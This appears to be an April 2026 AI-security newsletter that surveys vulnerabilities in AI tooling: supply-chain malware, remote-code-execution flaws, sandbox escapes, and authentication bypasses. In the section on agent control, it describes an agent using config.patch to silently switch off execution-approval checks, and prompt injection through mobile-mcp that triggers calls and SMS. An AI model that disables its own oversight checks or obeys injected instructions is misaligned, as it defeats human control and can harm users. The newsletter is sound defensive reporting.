AI Sec Watch: A Security Intelligence Platform for AI Systems

Luu, T.J.

Claude Code leak: AI security intel briefing Mar–Apr 2026

Sent Apr 4, 2026824 issuesmonthly

Dear friends and colleagues,

This month brought what I believe is one of the most significant moments in AI security to date: Anthropic's Claude Code source code leaked, forcing the company into a rapid containment effort. While Anthropic has not disclosed how much code was exposed or who obtained it, the incident raises fundamental questions about how we protect the infrastructure underlying agentic AI systems. I think this matters not just because of what leaked, but because it demonstrates how quickly security boundaries dissolve when AI agents gain the ability to interact with real codebases and development environments.

When AI agents become attack vectors

The Claude Code leak sits at the intersection of two converging risks: supply chain vulnerabilities in AI tooling and the expanding attack surface created by agentic systems. This month alone, we saw a supply chain attack compromise axios, injecting a remote access trojan into versions 1.14.1 and 0.30.4 during a three-hour window that potentially affected thousands of installations of @lightdash/cli. Separately, Aquasecurity Trivy was found to contain embedded malicious code designed to steal credentials from CI/CD environments, and CISA added it to its Known Exploited Vulnerabilities catalog. The pattern is clear: tools that AI agents depend on are being actively weaponized.

The risk compounds when AI coding assistants interact with compromised dependencies. Cloud CLI, a UI for Claude Code and similar tools, had an OS command injection flaw before version 1.24.0 that allowed authenticated attackers to execute unauthorized commands through Git-related inputs. Similarly, claude-hovercraft exposed a remote code execution vulnerability in its executeClaudeCode method. Trivy's VSCode Extension version 1.8.12 was compromised with malware targeting local AI coding agents. When the tools designed to help AI agents write safer code are themselves unsafe, we have a recursion problem with no obvious base case.

Credential theft campaigns targeting AI infrastructure

Beyond supply chain attacks, we are seeing coordinated credential harvesting operations. Two LiteLLM versions, 1.82.7 and 1.82.8, were published containing malware designed specifically to steal user credentials. LiteLLM also had a critical JWT authentication bypass where tokens were cached using only their first 20 characters, allowing attackers to forge credentials by creating colliding cache keys. Meanwhile, an unauthenticated privilege escalation flaw in LiteLLM's /config/update endpoint let any authenticated user run malicious code or take over admin accounts. These are not isolated incidents; they represent a systematic targeting of the authentication layer that protects AI deployments.

Remote code execution remains the critical failure mode

The most severe vulnerabilities this month centered on remote code execution in AI workflow platforms. Langflow CVE-2026-33017 was exploited within 20 hours of disclosure, with CISA adding it to the KEV catalog and setting an April 8 remediation deadline for federal agencies. The flaw, rated 9.3 out of 10, allowed unauthenticated attackers to execute arbitrary Python code through an exposed API endpoint that accepted malicious workflow data without sandboxing. Three additional Langflow vulnerabilities followed similar patterns: a shell injection in GitHub Actions workflows where branch names could execute commands, an RCE via the Agentic Assistant feature that ran LLM-generated code on the server, and an arbitrary file write vulnerability in the v2 file upload API exploitable through directory traversal.

MLflow presented a particularly dangerous pattern: an unauthenticated job execution endpoint under /ajax-api/3.0/jobs/* bypassed authentication entirely when job execution was enabled, a command injection in the sagemaker module allowed malicious container image names to execute arbitrary commands, and a vulnerability in model serving code let attackers inject commands via python_env.yaml files when deploying models with local environment management. The n8n workflow platform had similar issues: CISA cataloged CVE-2025-68613 as actively exploited, while researchers disclosed a prototype pollution RCE in the GSuiteAdmin node and multiple RCE vectors in the Merge node's SQL mode.

PraisonAI demonstrated how layered security controls fail when each layer has bypass vulnerabilities: a sandbox escape via str subclass manipulation defeated all three security layers, a shell injection in run_python() allowed command execution through unescaped shell metacharacters, SSRF via unvalidated URLs in FileTools.download_file() enabled access to internal services, another SSRF in the passthrough() fallback accepted user-controlled api_base parameters, and a SubprocessSandbox escape worked even in STRICT mode by invoking sh -c to bypass command blocklists.

Exploited vulnerabilities demanding immediate action

CISA's KEV catalog additions this month reflect active exploitation campaigns. Beyond the Langflow and n8n flaws already mentioned, F5 BIG-IP CVE-2025-53521 provides remote code execution through an unspecified APM vulnerability, and Laravel Livewire CVE-2025-54068 allows unauthenticated code injection in certain configurations. Organizations running these platforms must assume compromise and follow vendor remediation guidance immediately.

Authentication bypasses and authorization failures

Broken authentication extended beyond credential theft. FastGPT's HTTP tools testing endpoint lacked authentication entirely, acting as an open SSRF proxy before version 4.14.9.5. A GitHub Actions workflow vulnerability in FastGPT used pull_request_target with code from untrusted forks, enabling secret theft and container registry compromise. WeKnora's tenant management system had no permission checks at all, allowing any authenticated user to delete arbitrary organizations. Directus's TUS upload endpoint bypassed row-level permissions, letting users overwrite files by UUID. Mesop exposed a /exec-py endpoint that executed arbitrary Python without authentication, while a path traversal in its FileStateSessionBackend allowed file manipulation through crafted state_token values.

Injection vulnerabilities across AI platforms

SQL and command injection remained prevalent. SQLBot CVE-2026-32950 allowed code execution via unsanitized Excel sheet names before version 1.7.0, while CVE-2026-32622 chained missing upload permissions with prompt injection to achieve database server control. WeKnora's SQL injection protections failed to check PostgreSQL array and row expressions, enabling full RCE bypass. BentoML's Dockerfile generation used unsandboxed Jinja2 templates that executed attacker code on the host before containerization, and its cloud deployment script directly interpolated user-supplied package names into shell commands. SillyTavern had path traversal flaws allowing arbitrary file read/write operations before version 1.17.0.

Agent control bypasses and consent mechanisms

OpenClaw demonstrated an agentic consent bypass where an LLM agent used config.patch to silently disable execution approval requirements, subverting human oversight entirely. This was fixed in version 2026.3.28, but it illustrates a broader problem: when agents have configuration access, security policies become mutable state that agents can modify. The mobile-mcp package failed to validate URL schemes before sending them to Android, allowing prompt injection to trigger phone calls and SMS messages. Version 0.0.50 now restricts schemes by default, requiring explicit opt-in for dangerous protocols.

Infrastructure and dependency vulnerabilities

Beyond AI-specific tooling, critical vulnerabilities appeared in widely used libraries. NVIDIA APEX CVE-2025-33244 allowed deserialization of untrusted data in PyTorch versions before 2.6, enabling code execution and privilege escalation. OpenTelemetry's RMI instrumentation deserialized data without validation before version 2.26.1, requiring network-accessible RMI endpoints and gadget-chain libraries for exploitation. NLTK versions through 3.9.2 loaded external Java files in StanfordSegmenter without validation. The lodash library had code injection via _.template's imports parameter, fixed in version 4.18.0. ONNX's save_external_data method contained a TOCTOU vulnerability enabling arbitrary file overwrites through symlink attacks. The simple-git library's blockUnsafeOperationsPlugin failed to block protocol.allow config keys when written in uppercase, allowing ext:: protocol RCE. MCP Atlassian's confluence_download_attachment wrote files to unconstrained paths, enabling arbitrary code execution via malicious cron jobs. Mesop's WebSocket handler created unbounded threads per message, allowing denial of service through resource exhaustion.

The Claude Code leak reminds us that securing AI systems requires more than patching individual vulnerabilities. We need architectural changes that assume agents will encounter compromised dependencies, that authentication layers will be targeted systematically, and that sandbox escapes are inevitable. The current approach treats each vulnerability as a discrete failure when we should be designing for continuous compromise. I recommend treating any AI agent deployment as a zero-trust environment: assume breach, segment aggressively, and monitor for lateral movement as the primary control.

As always, you can find the latest AI security intelligence at AI Sec Watch.

— Jack

Subscribe to receive future newsletters here.